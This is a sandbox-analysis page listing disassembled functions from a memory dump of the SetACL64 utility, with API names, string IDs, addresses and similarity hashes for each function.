                                                  Function 00007FF7C17641C8 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                  • String ID:
                                                  • API String ID: 1330151763-0
                                                  • Opcode ID: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                                                  • Instruction ID: 711763ee801cf1b19f78c56fec3d3ee3e489092a33708c84b4028919ee051178
                                                  • Opcode Fuzzy Hash: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                                                  • Instruction Fuzzy Hash: FAC1B232B18A4285EB10EF6AC4906AC7760FB49BA8F904335DE2E577D6CF78D461C710
                                                  Function 00007FF7C173F660 Relevance: 13.7, APIs: 9, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid_invalid_parameter_noinfo_noreturn$Equal
                                                  • String ID:
                                                  • API String ID: 2161274208-0
                                                  • Opcode ID: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                                                  • Instruction ID: 0b78a94eb0db77e18f21a96b95c57bb20e99e8289aad4120fec31986e8159377
                                                  • Opcode Fuzzy Hash: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                                                  • Instruction Fuzzy Hash: 2191BF62A09A4691EB24AF23D4443BEA361FB49BF4FD44131DA5D87B96DFBCE440C321
                                                  Function 00007FF7C1745B20 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 313COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchState
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 40297248-393685449
                                                  • Opcode ID: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                                                  • Instruction ID: 38a88cacf2e437cb97eb7c5960e4be81a1f41461440a9c1ef239fd2e95f22b74
                                                  • Opcode Fuzzy Hash: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                                                  • Instruction Fuzzy Hash: 95D1C732A08B41C6EB20EF26D4402ADB7A0FB4D7A8F544135EE8D57B56CF78E491CB11
                                                  Function 00007FF7C171C7D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 291timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
                                                  • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
                                                  • API String ID: 1697026759-531884627
                                                  • Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                                  • Instruction ID: 32ab58d3bedea35a6c60edec11a13b9676dfa9f90269982f0f0da930f2ce0018
                                                  • Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                                  • Instruction Fuzzy Hash: E4D16D32618B8186EB20EF56F4802AEB7A5FB89794F904136EA8D43B59DF7CD544CB10
                                                  Function 00007FF7C17406C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C17408C0: IsValidSid.ADVAPI32(?,?,?,00007FF7C174034D,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C17408E2
                                                    • Part of subcall function 00007FF7C17408C0: GetLengthSid.ADVAPI32(?,?,?,00007FF7C174034D,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C17408F3
                                                  • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF7C1740516,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C1740789
                                                  • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF7C1740516,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C174079C
                                                  • EqualSid.ADVAPI32(?,?,?,?,?,?,00007FF7C1740516,?,?,?,?,?,00007FF7C173F8CF), ref: 00007FF7C17407AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid$EqualLength
                                                  • String ID: invalid hash bucket count
                                                  • API String ID: 2688289545-1101463472
                                                  • Opcode ID: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                                                  • Instruction ID: 41bc424ddd25dc0ec5932791411f96eedf9376d2d9af3572d681ebd99f8cd759
                                                  • Opcode Fuzzy Hash: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                                                  • Instruction Fuzzy Hash: 9E515936709B81C2EB54EF12E54416DB3A8FB48BE0B458436CB9D43B95DF78E464C760
                                                  Function 00007FF7C171A980 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
                                                  • String ID: asio.system
                                                  • API String ID: 2324539378-4188385678
                                                  • Opcode ID: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                                                  • Instruction ID: 5c9eaacc8a50bd4cb95683ef50ad814e1524de5431e02ad7b07ff4e5a5ab341d
                                                  • Opcode Fuzzy Hash: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                                                  • Instruction Fuzzy Hash: B7316F23A08A8281EF05BF17E5400B9E360EF8DBB0FA90131DA5D47797DEACE551C720
                                                  Function 00007FF7C170C870 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                  • String ID: \\?\UNC\
                                                  • API String ID: 2081738530-3025105874
                                                  • Opcode ID: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
                                                  • Instruction ID: fd92147e46f0e2c78b0d58c71bce671abd7e679408e56cb7509c13786c93a3c6
                                                  • Opcode Fuzzy Hash: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
                                                  • Instruction Fuzzy Hash: D3318021A4CB4281EB15BF27E8401B9E360FF5DBB0F880171DA5D47A97DFACE9418720
                                                  Function 00007FF7C1739D50 Relevance: 12.2, APIs: 8, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$DeleteInformationValid
                                                  • String ID:
                                                  • API String ID: 2376240148-0
                                                  • Opcode ID: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
                                                  • Instruction ID: 68ce0715cb57fd03db88d15e22ccf2b8c3bfbc118ed9def8336eb24b707d1333
                                                  • Opcode Fuzzy Hash: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
                                                  • Instruction Fuzzy Hash: F6619D32B19A4289FB10EF66E4843ADA3A5FF4C7A8FC00531DA4D57B86DFB8D4418324
                                                  Function 00007FF7C173C766 Relevance: 10.7, APIs: 7, Instructions: 213fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2384231905-0
                                                  • Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                                                  • Instruction ID: aa77afa73af46b485d18b2ca8fff9379b9130fffe91c8f87b2d042affea1c3ea
                                                  • Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                                                  • Instruction Fuzzy Hash: 9481A272B4864281EB10EF26E4493ADA351AB89BF4FD04232DB5D076EADFBCD580C350
                                                  Function 00007FF7C173C6A3 Relevance: 10.7, APIs: 7, Instructions: 181fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CreateFile_invalid_parameter_noinfo_noreturn$ErrorLast
                                                  • String ID:
                                                  • API String ID: 4071529928-0
                                                  • Opcode ID: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
                                                  • Instruction ID: 715e39ad223afb780c2b93a6475ca8283305534fb7d8e5089927bd8f34000cbf
                                                  • Opcode Fuzzy Hash: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
                                                  • Instruction Fuzzy Hash: 0351B372B0864181EB00EF26E4593ADA351AB89BB8FD04232DB5D076EADFBCD951C750
                                                  Function 00007FF7C1713670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                  • String ID: bad locale name$boost::too_few_args: format-string referred to more arguments than were passed
                                                  • API String ID: 2967684691-1915342359
                                                  • Opcode ID: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
                                                  • Instruction ID: 28002d6f8b65bc27fe562e1f3e54bdb9d729e7215710512fe6c6e78cc0bcddbe
                                                  • Opcode Fuzzy Hash: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
                                                  • Instruction Fuzzy Hash: 8A518C22F09B818AFB10EFB2D4402AC73B4AF98764F954135DE4D23A56DF78E466D710
                                                  Function 00007FF7C1737576 Relevance: 10.6, APIs: 7, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
                                                  • Instruction ID: d8251c1dc3eea9a84113b2908fbf80b772e9c63a513d269e0f4e18055837f31a
                                                  • Opcode Fuzzy Hash: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
                                                  • Instruction Fuzzy Hash: A0419662A1574685EF04AF6AD4993AC6225EF497B8FD04231EA6C066D7DFBCD090C214
                                                  Function 00007FF7C17482D8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C174835D
                                                  • GetLastError.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C174836B
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C1748395
                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C17483DB
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C17483E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
                                                  • Instruction ID: 16a6d03ef3dca6595d1eff51d8a6b737c411389eec5c1971c540635b27f21b3d
                                                  • Opcode Fuzzy Hash: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
                                                  • Instruction Fuzzy Hash: 6F31AE22B1A64685EB11EF57A84057EA394BB4CBB0F990535DE1D0B392DFBCE4548720
                                                  Function 00007FF7C1762DD4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
                                                  • Instruction ID: fac61b3b774c16bcd078a4357594a27f2de467af0ebbac6fd08227602e4cce7b
                                                  • Opcode Fuzzy Hash: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
                                                  • Instruction Fuzzy Hash: 28117F31B18A4186E750AF13E854729B7A0BB8DBF4F840234EA5E87B95CFBCD5448760
                                                  Function 00007FF7C1741A24 Relevance: 9.2, APIs: 6, Instructions: 203COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide
                                                  • String ID:
                                                  • API String ID: 2829165498-0
                                                  • Opcode ID: 7f76452235485e82c6a2b8be4f7a02939a3fff3751e97289b820c814a5331ee2
                                                  • Instruction ID: ec508c3f025446e14f1cc459374d354b81f4ca260e788a71192512feabb5da90
                                                  • Opcode Fuzzy Hash: 7f76452235485e82c6a2b8be4f7a02939a3fff3751e97289b820c814a5331ee2
                                                  • Instruction Fuzzy Hash: A481A33270878286EB20AF12D440379A6E1FB49BB8F944234EA5D57BC6DFBCE4059B14
                                                  Function 00007FF7C1733B20 Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF7C172F5AD), ref: 00007FF7C1733B8B
                                                  • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF7C172F5AD), ref: 00007FF7C1733BAF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Information
                                                  • String ID:
                                                  • API String ID: 2951059284-0
                                                  • Opcode ID: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
                                                  • Instruction ID: 28a0c719a72bbc1b5b49827dad7861c846dcfa4e2d37292db1706894706d1426
                                                  • Opcode Fuzzy Hash: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
                                                  • Instruction Fuzzy Hash: 60616422A0869685EB70EF13D45477AE7A0EF8DBA4FD48031DE8E47A96DE7CD441C720
                                                  Function 00007FF7C1718830 Relevance: 9.1, APIs: 6, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
